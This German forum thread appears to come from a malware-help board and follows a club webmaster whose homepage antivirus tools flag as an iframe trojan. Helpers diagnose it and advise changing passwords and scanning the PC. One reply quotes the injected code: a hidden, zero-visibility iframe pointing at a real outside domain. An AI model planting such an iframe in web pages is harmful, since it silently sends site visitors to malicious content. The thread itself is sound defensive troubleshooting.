|
Virus auf Homepage Startseite Schönen Guten Tag, ich brauche euer Wissen den allein schaffe ich das nicht. Was ist passiert. Angeblich habe ich einen Virus auf der Startseite unserer HP. h**p://tsv-windischleuba.de Ein paar User meldeten mir das dort eine Virus angezeigt wird. Bei mir wenn ich die Seite aufrufe nicht [Benutze Avast] Zu Testzwecken habe ich mir jetzt mal einen Virenscanner installiert bei dem diese Meldung angezeigt werden soll. Ich habe nun Kasperski 2011 als Testversion installiert und was muss ich sehen sobald ich die Seite aufrufe kommt diese Meldung. http://www.fotos-hochladen.net/thumb...l3u1_thumb.jpg h++p://www.fotos-hochladen.net/uploads/meldungni50l3u1.jpg Ich habe keine Ahnung wie das kommen kann. Ich hoffe das ihr mir weiter helfen könnt. |
was wird denn genau angezeigt? |
hxxp://www.bilder-space.de/show_img.php?img=8b1452-1282672158.jpg&size=original Benutze mal diesen Link habe mal das aus der Meldung ausgeschnitten. Hoffe es hilft dir weiter. |
hast du auf der seite den n bild gehostet? es ist auf jeden fall keins mehr unter dem link. hast du n backup deiner homepage? |
Also ich habe ein Backup von der Seite. Du kannst das Bild nicht sehen ? unter dem Link ? www.bilder-space.de/show_img.php?img=8b1452-1282672158.jpg&size=original Das Bild sollte die eigentlich zeigen was Kasperski meckert. Habe das mal auf einen anderen Bildhoster geladen damit du siehst was er anzeigt. Also wenn ich diese Zeile in den Browser kopiere zeigt er mir den Bildausschnitt an www.bilder-upload.eu/show.php?file=A0kvH15vKKcZGYX.jpg Alternativ dazu schreibe ich das mal hier rein. programm: firefox - gefunden: HEUR:Trojan.Script.Iframer - hxxp://tsv-windischleuba.de/favicon.ico Danke dir das du mir helfen willst !!!!!! |
hmm wenn ich das mal in den browser eingebe tsv-windischleuba.de/favicon.ico bekomme ich nen 404 not found. ich hab jetzt auch mal in den code der index seite geschaut, dort sehe ich auch nichts, kommt die meldung gleich bei der index page? |
Ja und nur auf der Startseite. Ich habe den Quelltext durchsucht, ich habe meinen Rechner durchsucht und auch die Page selbst und denoch finde ich keine favicon.ico und dennoch kommt diese Meldung wenn ich die Seite aufrufe. Ich versteh es nicht |
ist denn auf dem server wo sich die page befindet solch eine datei? was passiert wenn du n backup zurückspielst? |
Also auf dem Server ist keine solche Datei. Und das Backup ändert auch nix. Ich bin mit meinem Latein am Ende. |
ich sehe da auch im moment nichts.welche scanner schlagen noch an? |
AVG und Norton |
betreust du als einziger die seite? wie gesagt ich sehe da im mom nichts. |
Ja nur ich |
ich frag ma meine kolegen. |
das ist dort versteckt: HTML-Code: <body><script> was überstzt heisst: HTML-Code: <iframe src="http://beistri.net/nucf/index.php" height=5 width=5 style="display:none"></iframe>(kein fehlalarm) |
Vielen Dank ! Das bedeutet im klassischen Deutsch ? Das dies defenitiv kein Virus ist sondern ... ? Sorry für die Bitte einer Erklärung ! Kann man das abstellen das diese dumme Meldung nicht kommt ? Wenn ja ! ? ...... wie bitte ? Erkläre es mir als wäre ich 3 ....... glaub mir das wäre perfekt richtig ! ;) Man bin ich froh das das erstmal lokalisiert wurde. Vielen Dank .... unglaublich wie schnell man hier bedient wird!!!!! |
... ihr habt ein sicherheits problem... es ist jemanden gelungen über euren server oder euer webseiten-skript schadcode einzuschleusen. (es ist nur eine frage der zeit, bis das wieder passiert) dieser leitet die besucher 'unsichtbar' auf eine andere seite weiter. bis die lücke eindeutig identifiziert wurde, solltet ihr die seite offline nehmen.... |
ui das klingt nicht gut ! Ok Offline gehen ist eine Option aber was kann ich weiter tun ? Möchte nicht das die Offline bleibt. Wer kann dabei helfen das zu beheben ? Offline kann ja nicht die Lösung sein !? Bin für jede Hilfe dankbar. |
Halli Hallo, hab mir grade das ganze Zeugs angesehn... Sieht alles sehr interessant aus. Mir ist aufgefallen, dass nirgendwo auf der Startseite eine Referenz auf das Favicon besteht. Habe mal die URL zum Favicon in dem Prgramm Malzilla aufgerufen. Die Meldung bekam ich auch sofort. Nur das Interessante dabei war, dass es eure Seite garnicht mehr war :crazy: Das ganze war die 404 - Not Found-Seite eines Hosters "www.domainfactory.de". Dort findet man das von Guru genannte Inlineframe-Script. Das heißt für mich eigentlich, dass es womöglich auf deiner Seite irgendwo eine Referenz auf eine Datei gibt (Bild etc. ) welches nicht mehr vorhanden ist und automatisch auf die Hosterseite referenziert wird. Nur das würde dann leider nicht erklären, woher die Referenz zum Favicon herkommt, da ich wie schon gesagt nichts gefunden habe. Ich werd mal ein bisschen weiterforschen ;) Viele Grüße Handball10 |
Ich kann mich nur bedanken und virtuell ein Bier oder Kaffee rüber reichen. DANKE !!! |
Moin, hab eben nochmal aus Interesse eure Seite Scannen lassen: VirusTotal - Free Online Virus, Malware and URL Scanner Sieht doch relativ sauber aus ;) Ich denke, dass es wirklich am Webspaceanbieter liegt. Nur jetzt müsste man noch wissen, wo die falsche Referenz liegt. Eine Theorie hätte ich dazu noch: Womöglich war es so, dass eure Seite mal ein Favicon hatte und das jetzt nicht mehr der Fall ist. Das würde dann meiner Meinung nach heißen, das Browser die noch diese Informationen abgespeichert haben,auf das Favicon zugreifen wollen. Und anschließend kommt man auf die 404er-Seite des Anbieters. Werde mal ein bisschen nachher weiterforschen, was man so untergeschoben bekommt. Bin grade in der Schule,da geht das leider etwas schlecht. Mal sehn,was sich hinter dem ganzen Müll so verbirgt. Gruß Handball10 |
Allen die helfen ein dickes Dankeschön ! Wenn ihr das Problem lösen solltet können unsere Sportler endlich wieder voll die Seite geniessen. Also indirekt der Dank von ca. 130 Mitgliedern :dankeschoen: |
hmm der server ist doch gemietet nehme ich an, da würd ich mal zusätzlich druck beim betreiber machen, dass sicherheitslücken geschlossen werden deinen pc schon auf malware geprüft? hast du mal die passwörter für den ftp zugang geendert für deine page |
Malware scan läuft gerade,passwort wird geändert und ich werde wenn keine Malware drauf ist die Page mal auf einen anderen Anbieter testen. Mal sehen ob dann die Meldung auch erscheint. |
Malwarescan hat nix gefunden ! :applaus: |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 00:55 Uhr. |
Copyright ©2000-2025, Trojaner-Board